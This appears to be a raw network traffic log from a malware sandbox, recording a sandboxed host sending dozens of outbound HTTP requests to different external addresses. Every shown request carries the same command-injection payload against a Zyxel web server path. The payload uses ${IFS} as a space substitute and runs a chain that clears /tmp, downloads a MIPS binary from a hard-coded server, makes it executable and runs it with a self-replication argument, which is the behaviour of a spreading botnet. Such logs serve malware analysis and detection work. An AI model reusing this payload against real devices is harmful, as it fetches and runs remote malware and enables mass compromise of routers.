                                                Jan 29, 2024 07:08:01.612412930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7718192.168.2.2333084190.79.116.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612436056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7719192.168.2.2342256190.70.105.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612493038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7720192.168.2.2354924121.137.220.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612540007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7721192.168.2.234195892.116.240.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612560987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7722192.168.2.2347432126.197.127.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612612963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7723192.168.2.234192697.44.6.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612688065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7724192.168.2.2350320188.108.235.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612708092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7725192.168.2.2358932169.197.51.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612737894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7726192.168.2.2335568139.150.113.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612814903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7727192.168.2.2333800140.34.121.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612842083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7728192.168.2.234120651.98.251.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612885952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7729192.168.2.2336086199.245.127.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612945080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7730192.168.2.2334588124.25.82.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612973928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7731192.168.2.235671075.113.195.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613032103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7732192.168.2.2348956219.166.11.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613069057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7733192.168.2.234505468.161.169.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613116980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7734192.168.2.2341140139.130.246.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613145113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7735192.168.2.2353580197.222.214.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613193989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7736192.168.2.2349848117.92.206.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613224983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7737192.168.2.2348448194.123.179.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613257885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7738192.168.2.2348214208.173.148.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613305092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7739192.168.2.2351040207.108.64.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613360882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7740192.168.2.2341262213.6.80.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613411903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7741192.168.2.2337310119.13.78.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613432884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7742192.168.2.2355036186.124.1.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613462925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7743192.168.2.2340040150.220.217.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613528013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7744192.168.2.234259845.38.32.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613539934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7745192.168.2.235414225.120.33.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613590002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7746192.168.2.2350708116.75.89.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613620996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7747192.168.2.2335618174.218.202.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613693953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7748192.168.2.2334172210.160.44.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613718987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7749192.168.2.235742418.236.176.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613754034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7750192.168.2.236032886.7.67.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613785028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7751192.168.2.2356352183.62.34.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613825083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7752192.168.2.234283072.194.114.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613873005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7753192.168.2.235313265.55.216.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613940001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7754192.168.2.233702280.173.170.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.613981009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7755192.168.2.2337510110.121.187.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614007950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7756192.168.2.235154066.82.129.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614068031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7757192.168.2.233385064.23.174.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614097118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7758192.168.2.2359710131.200.234.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614131927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7759192.168.2.235703670.70.152.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614171028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7760192.168.2.2359618189.137.186.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614186049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7761192.168.2.233705079.121.119.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614254951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7762192.168.2.236065671.115.204.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614294052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7763192.168.2.233408686.95.187.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614310980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7764192.168.2.2344636212.59.145.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614383936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7765192.168.2.2347226192.167.137.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614407063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7766192.168.2.235428291.130.114.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614444971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7767192.168.2.2338700133.221.211.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614495993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7768192.168.2.235765241.89.96.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614547014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7769192.168.2.2349674199.203.220.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614581108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7770192.168.2.2352740104.173.171.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614638090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7771192.168.2.234360635.242.87.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614674091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7772192.168.2.2334462134.58.179.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614722013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7773192.168.2.235527031.239.101.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614782095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7774192.168.2.2347094111.245.179.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614813089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7775192.168.2.235800872.196.100.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614871979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7776192.168.2.2337840177.197.133.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614908934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7777192.168.2.234410046.252.237.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614934921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7778192.168.2.2340900152.246.105.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.614968061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7779192.168.2.2360714205.193.89.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615016937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7780192.168.2.2332944160.181.22.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615046024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7781192.168.2.2350270213.5.178.30443
                                                TimestampBytes transferredDirectionData
